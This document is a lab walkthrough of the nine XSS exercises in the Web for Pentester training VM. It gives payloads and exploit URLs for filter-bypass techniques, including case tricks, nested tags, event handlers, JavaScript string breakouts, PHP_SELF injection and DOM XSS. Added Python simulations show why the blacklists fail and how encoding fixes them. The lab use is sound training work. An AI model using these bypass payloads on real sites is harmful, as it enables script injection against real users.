Web for Pentester is a pre-configured virtual machine ISO prepared by PentesterLab for practicing web pentesting. In this article we are going to look at the XSS vulnerabilities. To set up the virtual machine, please visit the link :
Link : Install and configure Web for Pentester VM
In the Web for Pentester VM there are 9 XSS exercises (vulnerabilities), which are as follows :
To start with the examples, just click on an example link and it will open the example page.
In the above screenshot we can see the Example 1 page. Now let's start with the examples.
Example 1 :
In the first example there is no filter mechanism of any kind, as we can see in the source code.
Note : To view the source code in the browser press Control + U.
So the payload will be :
Payload :
<script>alert(1)</script>
Exploit : http://192.168.56.101/xss/example1.php?name=<script>alert(1)</script>
Example 2 :
In Example 2 there is a filter mechanism which strips the <script> and </script> tags when we try the previous payload on it.
To bypass it, we need to change the case of the word script like this : ScRIpt or sCRipt or SCRIPt or ScripT. Now the payload will be,
Payload :
<sCrIpt>alert(1)</ScRipt>
Exploit : http://192.168.56.101/xss/example2.php?name=<sCrIpt>alert(1)</ScRipt>
Example 3 :
Example 3 also filters the <script> tag like Example 2, but this time the filter matches both uppercase and lowercase letters. To bypass it, we can abuse the filter itself by putting a <script> tag inside another script tag, so that the filter removes only the inner tag. For example : <scr<script>ipt>; after the filtering only <script> remains.
Payload :
<scr<script>ipt>alert(1)</scri</script>pt>
Exploit :
http://192.168.56.101/xss/example3.php?name=<scr<script>ipt>alert(1)</scri</script>pt>
Example 4 :
Example 4 does not filter the tag; instead, if it detects the word script (in upper or lower case) it shows an error message. To bypass it we need to use HTML tags with event handlers instead of script tags, like <body onload="alert(1)">, <video src=_ onloadstart="alert(1)">, <b/ onmouseover="alert(1)">, <img src="x" onerror="alert(1)"> etc.
Payload :
<body onload="alert(1)">
Exploit : http://192.168.56.101/xss/example4.php?name=<body onload="alert(1)">
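To see why each of the blacklists in Examples 2, 3 and 4 fails, here is an added Python simulation (not the VM's code; the filter functions and the `executes` oracle are my assumptions about how the exercises behave) that runs the three payloads above through each filter and then through plain output encoding:

```python
import html
import re

# Constructed simulations of the blacklist styles Examples 2, 3 and 4 use
# (my assumptions about the exercise logic, not the VM's actual PHP source).

def filter_case_sensitive(s):
    """Example 2 style: strips only lowercase <script> and </script>."""
    return s.replace("<script>", "").replace("</script>", "")

def filter_one_pass(s):
    """Example 3 style: case-insensitive, but applied exactly once."""
    return re.sub(r"</?script>", "", s, flags=re.IGNORECASE)

def filter_keyword_block(s):
    """Example 4 style: reject the request if 'script' appears anywhere."""
    if re.search("script", s, re.IGNORECASE):
        raise ValueError("error: forbidden word")
    return s

def filter_until_stable(s):
    """Re-run the strip until nothing changes: closes the nesting hole only."""
    while (out := filter_one_pass(s)) != s:
        s = out
    return s

def html_encode(s):
    """Output encoding (PHP htmlspecialchars equivalent): the real fix."""
    return html.escape(s, quote=True)

def executes(rendered):
    """Crude oracle: a script tag or an on* event handler attribute survived."""
    return re.search(r"<script>|<\w+[^>]*\son\w+\s*=", rendered, re.I) is not None

PAYLOADS = {  # the three payloads from the walkthrough above
    "example2": "<sCrIpt>alert(1)</ScRipt>",
    "example3": "<scr<script>ipt>alert(1)</scri</script>pt>",
    "example4": '<body onload="alert(1)">',
}

def survivors(defence):
    """Names of the payloads that still execute after `defence` is applied."""
    out = []
    for name, payload in PAYLOADS.items():
        try:
            if executes(defence(payload)):
                out.append(name)
        except ValueError:
            pass  # request rejected, so the payload never reached the page
    return out
```

`survivors(filter_one_pass)` returns `['example3', 'example4']` and even `survivors(filter_until_stable)` still returns `['example4']`; only `survivors(html_encode)` is empty, which is why encoding on output rather than stripping on input is the fix.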
Example 5 :
Example 5 filters the alert text, so we can bypass it by putting prompt() in place of alert().
Payload :
<script>prompt(1)</script>
Exploit : http://192.168.56.101/xss/example5.php?name=<script>prompt(1)</script>
Example 6 :
In Example 6 the given data is stored in the variable $a inside a JavaScript <script> tag.
To exploit it we do not need a <script> tag: the payload closes the double quote ( " ), runs alert(1), and then starts a new assignment x=" so that the original closing quote still belongs to a valid statement.
Payload :
";alert(1);x="
Exploit : http://192.168.56.101/xss/example6.php?name=";alert(1);x="
Example 7 :
Example 7 is the same as Example 6, except that it uses a single quote ( ' ), so we need to replace the double quote ( " ) in the Example 6 payload with a single quote ( ' ).
Payload :
';alert(1);x='
Exploit : http://192.168.56.101/xss/example7.php?name=';alert(1);x='
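Examples 6 and 7 are a JavaScript-string context, where HTML tag filters are irrelevant. The added Python model below (my reconstruction of the template, not the VM's source; `render_vulnerable`, `js_string_literal` and `is_single_string_literal` are assumed names) shows that both payloads above terminate the string literal, and that JSON-encoding the value with `<`, `>` and `&` additionally escaped keeps it a single literal:

```python
import json
import re

# Constructed model of the Example 6/7 sink: the name lands inside a JS
# string literal in a <script> block (my reconstruction, not the VM's source).

def render_vulnerable(name, quote='"'):
    """Example 6 uses double quotes, Example 7 single quotes."""
    return f"<script>var $a = {quote}{name}{quote};</script>"

def js_string_literal(value):
    """Context-aware encoding for a JS string: json.dumps escapes quotes and
    backslashes; <, > and & are \\u-escaped too so the value can never close
    the surrounding <script> block."""
    return (json.dumps(value).replace("<", "\\u003c")
                             .replace(">", "\\u003e")
                             .replace("&", "\\u0026"))

def render_fixed(name):
    return f"<script>var $a = {js_string_literal(name)};</script>"

def initialiser(rendered):
    """The expression assigned to $a in the rendered script block."""
    return re.search(r"var \$a = (.*);</script>", rendered, re.S).group(1)

def is_single_string_literal(expr):
    """True only if expr is one JS string literal: an opening quote, then
    characters or backslash escapes, and the closing quote at the very end."""
    if len(expr) < 2 or expr[0] not in "\"'":
        return False
    quote, i = expr[0], 1
    while i < len(expr):
        ch = expr[i]
        if ch == "\\":
            i += 2                       # skip the escaped character
        elif ch == quote:
            return i == len(expr) - 1    # early quote = string terminated
        elif ch in "\r\n":
            return False                 # unescaped newline ends a literal
        else:
            i += 1
    return False

def breaks_out(rendered):
    """Does the injected name escape the string context?"""
    return not is_single_string_literal(initialiser(rendered))

PAYLOAD_DQ = '";alert(1);x="'    # Example 6 payload from the walkthrough
PAYLOAD_SQ = "';alert(1);x='"    # Example 7 payload from the walkthrough
```

`breaks_out(render_vulnerable(PAYLOAD_DQ))` and `breaks_out(render_vulnerable(PAYLOAD_SQ, "'"))` are both true, while `render_fixed` keeps either payload, and even the Example 1 payload, inside one literal.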
Example 8 :
In Example 8 the provided data is shown in the page, but it is encoded with the PHP htmlentities() function, which prevents our payload from executing as stored XSS.
But when we look at the source code of the page, it uses the PHP_SELF variable in the form to get the page path. So by putting the payload in the URL we can execute our code. We also need "> before the payload to close the form tag, and note that the / at the end of the URL path is also important.
Payload :
/"><script>alert(1)</script>
Exploit : http://192.168.56.101/xss/example8.php/"><script>alert(1)</script>
Or we can also use the payload below :
/"><body onload=alert(1)>
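To see why the entity encoding on the input field does not help here, this added Python model of Example 8 (my reconstruction of the template, not the VM's source; `SCRIPT_NAME`, `render_example8` and `has_injected_tag` are assumed names) builds the form action from PHP_SELF, which in PHP is the script name plus any extra path sent after it:

```python
import html

# Constructed model of the Example 8 page: the name field is entity-encoded
# (as described above) but the form's action is built from PHP_SELF, which
# is the script name plus the decoded extra path (PATH_INFO) of the request.
# This is my reconstruction, not the VM's actual PHP source.

SCRIPT_NAME = "/xss/example8.php"

def php_self(request_path):
    """PHP_SELF for a request: script name plus the decoded trailing path."""
    if not request_path.startswith(SCRIPT_NAME):
        raise ValueError("request is not for this script")
    return request_path

def render_example8(request_path, name, escape_action):
    """The field value is always encoded; the action only if escape_action."""
    action = php_self(request_path)
    if escape_action:
        action = html.escape(action, quote=True)  # htmlspecialchars equivalent
    return (f'<form action="{action}" method="POST">'
            f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'
            f'</form>')

def has_injected_tag(rendered):
    """Crude oracle: a raw script or body tag appeared outside any attribute."""
    return "<script>" in rendered or "<body " in rendered

# Request path from the walkthrough's Example 8 exploit (decoded form).
PAYLOAD_PATH = SCRIPT_NAME + '/"><script>alert(1)</script>'
```

`has_injected_tag(render_example8(PAYLOAD_PATH, "bob", False))` is true while the same call with `escape_action=True` is not; the simpler fix is to not echo PHP_SELF at all and use a fixed action path.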
And also note that you have to put the payload in the address bar of the browser, not in the page input field.
Example 9 :
Example 9 is a DOM based XSS. It takes input from the URL after the #, so we can put our payload after the #.
Payload :
<script>alert(1)</script>
Exploit : http://192.168.56.101/xss/example9.php#<script>alert(1)</script>
Note : Example 9 may not work on modern browsers, because they have protection against DOM based attacks, so test it on older browser versions. It works on Internet Explorer on Windows XP.
Conclusion :
Above we have exploited all the XSS vulnerabilities in the Web for Pentester VM.
Also check out our other articles related to XSS.
Links :
What is Cross Site Scripting (XSS)
Reflected XSS
Stored XSS
DOM Based XSS
XSS Payloads Collection and Important Links